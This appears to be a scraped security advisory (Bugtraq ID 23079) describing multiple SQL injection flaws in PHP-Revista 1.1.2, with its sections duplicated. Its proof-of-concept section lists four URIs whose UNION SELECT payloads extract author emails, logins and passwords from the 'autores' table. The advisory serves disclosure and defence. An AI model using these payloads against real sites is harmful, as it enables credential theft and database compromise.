PHP-Revista Multiple SQL Injection Vulnerabilities
BID:23079
CVE-2006-4606 |Info
PHP-Revista Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 23079 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 21 2007 12:00AM |
| Updated: | Mar 21 2007 09:13PM |
| Credit: | Cold z3ro is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PHP-Revista PHP-Revista 1.1.2 |
| Not Vulnerable: | |
Discussion
PHP-Revista Multiple SQL Injection Vulnerabilities
PHP-Revista is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
PHP-Revista version 1.1.2 is vulnerable; other versions may also be affected.
PHP-Revista is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
PHP-Revista version 1.1.2 is vulnerable; other versions may also be affected.
Exploit / POC
PHP-Revista Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/revista/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/revista/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
http://www.example.com/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1
Solution / Fix
PHP-Revista Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:[email protected].